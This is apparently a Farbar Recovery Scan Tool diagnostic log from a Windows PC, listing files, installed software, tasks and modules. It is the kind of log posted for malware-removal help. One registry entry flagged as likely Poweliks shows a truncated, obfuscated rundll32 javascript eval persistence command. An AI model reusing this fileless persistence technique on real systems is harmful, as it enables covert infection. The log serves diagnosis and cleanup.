    2014-11-22 22:36 - 2014-04-09 12:59 - 05904880 _____ (Intel Corporation) C:\windows\system32\GfxUI.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00515568 _____ (Intel Corporation) C:\windows\system32\igfxsrvc.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00442352 _____ (Intel Corporation) C:\windows\system32\igfxpers.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00399856 _____ (Intel Corporation) C:\windows\system32\hkcmd.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00279024 _____ (Intel Corporation) C:\windows\SysWOW64\IntelCpHeciSvc.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00254960 _____ (Intel Corporation) C:\windows\system32\igfxext.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00185840 _____ (Intel Corporation) C:\windows\system32\difx64.exe
    2014-11-22 22:36 - 2014-04-09 12:59 - 00172016 _____ (Intel Corporation) C:\windows\system32\igfxtray.exe
    2014-11-22 22:36 - 2014-03-26 09:05 - 00342528 _____ (Intel(R) Corporation) C:\windows\system32\Drivers\IntcDAud.sys
    2014-11-22 22:36 - 2014-03-20 07:48 - 00017074 _____ () C:\windows\system32\iglhxs64.vp
    2014-11-22 22:36 - 2014-03-20 07:41 - 11176448 _____ (Intel Corporation) C:\windows\SysWOW64\igd10umd32.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 12617728 _____ (Intel Corporation) C:\windows\system32\igdumd64.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 05363520 _____ (Intel Corporation) C:\windows\system32\Drivers\igdkmd64.sys
    2014-11-22 22:36 - 2014-03-20 07:40 - 00442880 _____ (Intel Corporation) C:\windows\system32\igfxdev.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00440320 _____ (Intel Corporation) C:\windows\system32\igfxrell.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00439808 _____ (Intel Corporation) C:\windows\system32\igfxrfra.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00439808 _____ (Intel Corporation) C:\windows\system32\igfxresn.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00439296 _____ (Intel Corporation) C:\windows\system32\igfxrrus.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00439296 _____ (Intel Corporation) C:\windows\system32\igfxrrom.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrsky.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrptg.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrplk.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrnld.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrita.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrhrv.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438784 _____ (Intel Corporation) C:\windows\system32\igfxrdeu.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrhun.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrfin.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00438272 _____ (Intel Corporation) C:\windows\system32\igfxrcsy.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrtrk.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrsve.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrslv.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrptb.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437760 _____ (Intel Corporation) C:\windows\system32\igfxrnor.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437248 _____ (Intel Corporation) C:\windows\system32\igfxrtha.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00437248 _____ (Intel Corporation) C:\windows\system32\igfxrdan.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00435712 _____ (Intel Corporation) C:\windows\system32\igfxrheb.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00435712 _____ (Intel Corporation) C:\windows\system32\igfxrara.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00432128 _____ (Intel Corporation) C:\windows\system32\igfxrjpn.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00431104 _____ (Intel Corporation) C:\windows\system32\igfxrkor.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00429056 _____ (Intel Corporation) C:\windows\system32\igfxrcht.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00428544 _____ (Intel Corporation) C:\windows\system32\igfxrchs.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00410624 _____ (Intel Corporation) C:\windows\system32\igfxTMM.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00384512 _____ (Intel Corporation) C:\windows\system32\igfxpph.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00286208 _____ (Intel Corporation) C:\windows\system32\igfxrenu.lrc
    2014-11-22 22:36 - 2014-03-20 07:40 - 00175104 _____ (Intel Corporation) C:\windows\system32\gfxSrvc.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00142336 _____ (Intel Corporation) C:\windows\system32\igfxdo.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00126976 _____ (Intel Corporation) C:\windows\system32\igfxcpl.cpl
    2014-11-22 22:36 - 2014-03-20 07:40 - 00099328 _____ () C:\windows\system32\igdde64.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00078848 _____ () C:\windows\SysWOW64\igdde32.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00028672 _____ (Intel Corporation) C:\windows\system32\igfxexps.dll
    2014-11-22 22:36 - 2014-03-20 07:40 - 00009728 _____ ( ) C:\windows\system32\IGFXDEVLib.dll
    2014-11-22 22:36 - 2014-03-20 07:39 - 00330752 _____ (Intel Corporation) C:\windows\SysWOW64\igfxdv32.dll
    2014-11-22 22:36 - 2014-03-20 07:39 - 00025088 _____ (Intel Corporation) C:\windows\SysWOW64\igfxexps32.dll
    2014-11-22 22:36 - 2014-03-20 07:37 - 13031424 _____ (Intel Corporation) C:\windows\system32\ig4icd64.dll
    2014-11-22 22:36 - 2014-03-20 07:37 - 10812928 _____ (Intel Corporation) C:\windows\SysWOW64\ig4icd32.dll
    2014-11-19 22:16 - 2014-11-19 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel Driver Update Utility
    2014-11-19 22:16 - 2014-11-19 22:16 - 00000000 ____D () C:\Program Files (x86)\Intel Driver Update Utility

    ==================== One Month Modified Files and Folders =======

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2014-12-17 10:24 - 2014-11-03 13:53 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
    2014-12-17 10:19 - 2014-11-03 12:49 - 01434965 _____ () C:\windows\WindowsUpdate.log
    2014-12-17 10:00 - 2014-11-03 13:59 - 00000416 _____ () C:\windows\Tasks\DCAgentUpdater.job
    2014-12-17 09:33 - 2014-11-03 13:55 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
    2014-12-17 09:05 - 2014-11-03 14:39 - 00000142 _____ () C:\windows\ODBC.INI
    2014-12-17 09:04 - 2009-07-13 23:45 - 00027440 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2014-12-17 09:04 - 2009-07-13 23:45 - 00027440 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2014-12-17 09:01 - 2009-07-14 00:13 - 00785366 _____ () C:\windows\system32\PerfStringBackup.INI
    2014-12-17 08:54 - 2014-11-03 13:55 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
    2014-12-17 08:53 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT
    2014-12-17 08:53 - 2009-07-13 23:51 - 00041210 _____ () C:\windows\setupact.log
    2014-12-17 08:52 - 2010-11-20 22:47 - 00034106 _____ () C:\windows\PFRO.log
    2014-12-16 22:00 - 2014-11-03 14:30 - 00000542 _____ () C:\windows\Tasks\Daily scheduled scan.job
    2014-12-15 14:52 - 2009-07-13 21:34 - 00450771 ____R () C:\windows\system32\Drivers\etc\hosts.20141215-154132.backup
    2014-12-15 10:10 - 2014-06-05 08:55 - 00798516 _____ () C:\windows\SysWOW64\PerfStringBackup.INI
    2014-12-14 18:57 - 2014-11-03 13:53 - 00000624 _____ () C:\windows\system32\config\netlogon.ftl
    2014-12-12 16:57 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Greenshot
    2014-12-12 15:47 - 2014-11-03 13:55 - 00002189 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
    2014-12-11 13:52 - 2014-11-05 11:11 - 00000000 ____D () C:\Users\gluskid\Documents\PPT
    2014-12-08 19:09 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\DesktopCentral_Agent
    2014-12-08 14:47 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\LiveKernelReports
    2014-12-08 13:20 - 2014-11-03 15:13 - 00009004 __RSH () C:\Users\gluskid\ntuser.pol
    2014-12-08 13:20 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid
    2014-12-04 13:03 - 2014-11-12 17:12 - 00000000 ____D () C:\Program Files (x86)\Intel
    2014-12-04 13:02 - 2014-11-10 11:24 - 00000000 ____D () C:\windows\system32\appmgmt
    2014-12-03 11:45 - 2014-11-12 12:02 - 00000000 ____D () C:\ProgramData\WebEx
    2014-12-02 15:39 - 2014-11-04 15:11 - 00000000 ____D () C:\Users\gluskid\Desktop\Urban
    2014-12-02 11:59 - 2014-11-04 15:11 - 00000000 ____D () C:\Users\gluskid\Desktop\Pardal
    2014-12-02 09:55 - 2014-11-03 15:13 - 00000000 ____D () C:\Users\gluskid\AppData\Local\Microsoft Help
    2014-11-27 16:40 - 2014-06-05 08:25 - 112710672 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
    2014-11-25 10:55 - 2014-11-12 14:08 - 00000000 ____D () C:\Users\gluskid\Desktop\AboveBelow the Line
    2014-11-25 10:21 - 2009-07-13 23:45 - 00423400 _____ () C:\windows\system32\FNTCACHE.DAT
    2014-11-24 15:38 - 2014-11-03 15:13 - 00111256 _____ () C:\Users\gluskid\AppData\Local\GDIPFONTCACHEV1.DAT
    2014-11-24 04:14 - 2014-11-05 16:34 - 00000000 _____ () C:\windows\system32\vireng.log
    2014-11-23 20:43 - 2014-11-03 14:21 - 00037174 __RSH () C:\ProgramData\ntuser.pol
    2014-11-22 22:41 - 2014-11-12 19:29 - 00015370 _____ () C:\windows\system32\results.xml
    2014-11-22 22:36 - 2014-11-10 20:19 - 00000000 ____D () C:\ProgramData\Intel
    2014-11-22 22:36 - 2014-11-10 11:36 - 00000000 ____D () C:\ProgramData\Package Cache
    2014-11-22 22:36 - 2014-11-03 13:54 - 00000000 ____D () C:\Program Files (x86)\Cisco
    2014-11-22 22:36 - 2014-06-05 08:36 - 00000000 ____D () C:\Intel
    2014-11-22 22:34 - 2014-11-10 20:18 - 00000000 ____D () C:\Program Files\Intel
    2014-11-22 22:34 - 2014-11-03 12:35 - 00063208 _____ () C:\windows\DPINST.LOG
    2014-11-19 23:22 - 2014-11-10 20:22 - 00006198 _____ () C:\WirelessDiagLog.csv
    2014-11-19 23:20 - 2014-11-10 20:20 - 00000000 ____D () C:\Users\gluskid\AppData\Roaming\Intel

    ==================== Bamital & volsnap Check =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\System32\winlogon.exe => File is digitally signed
    C:\Windows\System32\wininit.exe => File is digitally signed
    C:\Windows\SysWOW64\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\System32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\System32\services.exe => File is digitally signed
    C:\Windows\System32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\System32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\System32\rpcss.dll => File is digitally signed
    C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2014-12-15 13:09

    ==================== End Of Log ============================

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-12-2014 01
    Ran by gluskid at 2014-12-17 10:30:52
    Running from C:\Users\gluskid\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2PB313KY
    Boot Mode: Normal
    ==========================================================


    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Spybot - Search and Destroy (Enabled - Up to date) {20A26C15-1AF0-7CA3-9380-FAB824A7EE0D}
    AV: Sophos Anti-Virus (Enabled - Up to date) {6BABF8F7-3EB6-BD1D-9167-8C5ECA060A29}
    AS: Sophos Anti-Virus (Enabled - Up to date) {D0CA1913-188C-B293-ABD7-B72CB1814094}
    AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
    FW: Sophos Client Firewall (Enabled) {539079D2-74D9-BC45-BA38-256B34D54D52}

    ==================== Installed Programs ======================

    (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.0.0 - Adobe Systems)
    Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
    Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
    Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
    Arkadin Outlook AddOn 3.1.8.0 (HKLM\...\Arkadin Outlook AddOn_is1) (Version: 3.1.8.0 - Arkadin)
    ASAP Utilities (HKLM-x32\...\ASAP Utilities_is1) (Version: 4.8.0 - Bastien Mensink - A Must in Every Office BV)
    Cisco AnyConnect VPN Client (HKLM-x32\...\{C1EC4E2D-6F63-4806-B88E-7685B6EC186E}) (Version: 2.5.6005 - Cisco Systems, Inc.)
    Cisco Jabber (HKLM-x32\...\{0705CE47-12C7-4B51-8585-C9463074B6CE}) (Version: 9.7.0.18474 - Cisco Systems, Inc)
    Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version: - Cisco WebEx LLC)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Greenshot 1.1.7.17 (HKLM\...\Greenshot_is1) (Version: 1.1.7.17 - Greenshot)
    Intel(R) Chipset Device Software (x32 Version: 10.0.13 - Intel(R) Corporation) Hidden
    Intel(R) Driver Update Utility 2.0 (x32 Version: 2.0.0.29 - Intel) Hidden
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.3517 - Intel Corporation)
    Intel® Driver Update Utility (HKLM-x32\...\{8409c4f7-2340-4933-a304-5d37db4fb48b}) (Version: 2.0.0.29 - Intel)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{eddf4201-b72e-4e94-9e7b-ac1ba97c029f}) (Version: 16.11.0 - Intel Corporation)
    Java 8 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418025F0}) (Version: 8.0.250 - Oracle Corporation)
    Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
    ManageEngine AssetExplorer Agent (HKLM-x32\...\{B64DBD74-C4E8-4404-BE32-81769EC14472}) (Version: 1.0.12 - ZOHO Corp)
    ManageEngine Desktop Central 9 - Agent (HKLM-x32\...\{6AD2231F-FF48-4D59-AC26-405AFAE23DB7}) (Version: 9.0.23.W - ZohoCorp)
    Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
    Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
    Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0012-0000-0000-0000000FF1CE}_Office14.STANDARD_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
    Microsoft Office Standard 2010 (HKLM-x32\...\Office14.STANDARD) (Version: 14.0.6029.1000 - Microsoft Corporation)
    Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
    Microsoft Visio Viewer 2010 (HKLM-x32\...\{95140000-0052-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
    Mozilla Firefox 32.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0 (x86 en-US)) (Version: 32.0 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 32.0 - Mozilla)
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    PDF24 Creator 5.6.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
    Sophos Anti-Virus (HKLM-x32\...\{D929B3B5-56C6-46CC-B3A3-A1A784CBB8E4}) (Version: 10.3.11 - Sophos Limited)
    Sophos AutoUpdate (HKLM-x32\...\{D924231F-D02D-4E0B-B511-CC4A0E3ED547}) (Version: 3.1.4.81 - Sophos Limited)
    Sophos Client Firewall (HKLM-x32\...\{A805FB2A-A844-4cba-8088-CA64087D59E1}) (Version: 2.9.4 - Sophos Limited)
    Sophos Remote Management System (HKLM-x32\...\{FED1005D-CBC8-45D5-A288-FFC7BB304121}) (Version: 3.4.1 - Sophos Limited)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
    WebEx Productivity Tools (HKLM-x32\...\{17BC5B75-6692-40E6-A347-849F595BC802}) (Version: 2.29.3210 - Cisco WebEx LLC)
    WinZip 12.1 (HKLM-x32\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8519 - WinZip Computing, S.L. )

    ==================== Custom CLSID (selected items): ==========================

    (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

    CustomCLSID: HKU\S-1-5-21-2118340153-1145135853-813105556-21214_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?

    ==================== Restore Points =========================

    11-11-2014 02:34:42 Intel® PROSet/Wireless Software
    13-11-2014 12:47:04 Intel® PROSet/Wireless Software
    13-11-2014 12:48:28 Intel® Driver Update Utility
    13-11-2014 13:08:58 Installed Intel(R) PROSet/Wireless WiFi Software.
    19-11-2014 22:13:00 Windows Update
    20-11-2014 03:11:35 Removed Intel(R) PROSet/Wireless WiFi Software.
    20-11-2014 03:16:00 Intel® Driver Update Utility
    20-11-2014 04:18:33 Intel® PROSet/Wireless Software
    23-11-2014 03:33:54 Intel® PROSet/Wireless Software
    24-11-2014 20:33:54 Installed HP Support Solutions Framework
    25-11-2014 14:17:10 Windows Update
    02-12-2014 12:30:43 Windows Update
    04-12-2014 18:01:35 Removed HP Support Solutions Framework
    05-12-2014 14:57:53 Windows Update
    12-12-2014 17:44:37 Windows Update

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-13 21:34 - 2014-12-15 15:41 - 00000938 ____R C:\windows\system32\Drivers\etc\hosts

    ==================== Scheduled Tasks (whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

    Task: {1E7C52DB-6491-4F9D-9483-7C46B126D266} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
    Task: {4A59349A-0EB4-42E3-8E9C-11B6B0E1E132} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-03] (Google Inc.)
    Task: {6B3E56F7-3B4C-47D9-8443-0EA47EB8EC60} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-03] (Google Inc.)
    Task: {DAF733EF-918F-4C97-A6D2-6AFD50DE9618} - System32\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask => Sc.exe start osppsvc
    Task: {DBE3B7EB-82B9-484C-BBF6-73AF39ECEC66} - System32\Tasks\Daily scheduled scan => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe [2014-11-03] (Sophos Limited)
    Task: {DEB60DF5-D86A-4AA6-9902-B9EB2B986769} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-03] (Adobe Systems Incorporated)
    Task: {E2139D9F-02DC-47AC-9FD0-2115F34C5049} - System32\Tasks\DCAgentUpdater => C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentupgrader.exe [2014-05-16] ()
    Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
    Task: C:\windows\Tasks\Daily scheduled scan.job => C:\Program Files (x86)\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe
    Task: C:\windows\Tasks\DCAgentUpdater.job => C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentupgrader.exe
    Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
    Task: C:\windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

    ==================== Loaded Modules (whitelisted) =============

    2012-06-28 17:09 - 2012-06-28 17:09 - 00598016 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\agentmonitor.exe
    2012-06-28 17:09 - 2012-06-28 17:09 - 00614400 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\aeagent.exe
    2014-05-16 04:13 - 2014-05-16 04:13 - 00556392 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagentservice.exe
    2014-05-16 04:13 - 2014-05-16 04:13 - 00593256 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcondemand.exe
    2014-05-16 04:13 - 2014-05-16 04:13 - 00806248 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcswmeter.exe
    2012-01-10 20:12 - 2012-01-10 20:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
    2014-05-16 04:13 - 2014-05-16 04:13 - 00769384 _____ () C:\Program Files (x86)\DesktopCentral_Agent\bin\dcagenttrayicon.exe
    2012-06-28 17:09 - 2012-06-28 17:09 - 00159744 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\SSLEAY32.dll
    2012-06-28 17:09 - 2012-06-28 17:09 - 00843776 _____ () C:\Program Files (x86)\ManageEngine\AssetExplorer\bin\LIBEAY32.dll
    2014-12-15 00:02 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2014-12-15 00:02 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2014-12-15 00:02 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2014-12-15 00:02 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2014-12-15 00:02 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 01055808 _____ () C:\Program Files (x86)\Sophos\Remote Management System\ACE.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 01539136 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00183360 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_DynamicAny.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00760896 _____ () C:\Program Files (x86)\Sophos\Remote Management System\LIBEAY32.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00146496 _____ () C:\Program Files (x86)\Sophos\Remote Management System\SSLEAY32.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00076864 _____ () C:\Program Files (x86)\Sophos\Remote Management System\ACE_SSL.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00535616 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_PortableServer.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00244800 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_SSLIOP.DLL
    2014-11-03 14:52 - 2014-11-03 14:52 - 00740416 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_Security.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00039488 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_Valuetype.dll
    2014-11-03 14:52 - 2014-11-03 14:52 - 00244800 _____ () C:\Program Files (x86)\Sophos\Remote Management System\TAO_SSLIOP.dll
    2014-12-15 00:02 - 2014-04-25 14:11 - 02972112 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\NotificationSpreader.dll
    2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
    2014-11-04 15:42 - 2014-11-01 08:54 - 00004608 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ManagedAggregator2010.dll
    2014-11-04 15:42 - 2014-11-01 08:54 - 00035328 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\Outlook2010Addin.dll
    2014-11-04 15:42 - 2014-11-01 08:54 - 00005632 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\Outlook2010Interface.dll
    2014-11-04 15:42 - 2014-11-01 08:54 - 00216576 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ArkaOutlookInterface2010.dll
    2014-11-04 15:42 - 2014-11-01 08:54 - 00101888 _____ () C:\Program Files (x86)\Arkadin\Outlook AddOn V3\ArkaOutlookAddin.dll
    2010-10-25 15:13 - 2010-10-25 15:13 - 02893216 _____ () C:\Program Files (x86)\Adobe\Acrobat 10.0\PDFMaker\Common\AdobePDFMakerX.dll
    2010-12-21 01:15 - 2010-12-21 01:15 - 01041248 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll

    ==================== Alternate Data Streams (whitelisted) =========

    (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


    ==================== Safe Mode (whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SAVService => ""="service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SAVService => ""="service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sophos Client Firewall => ""="service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sophos Client Firewall Manager => ""="service"

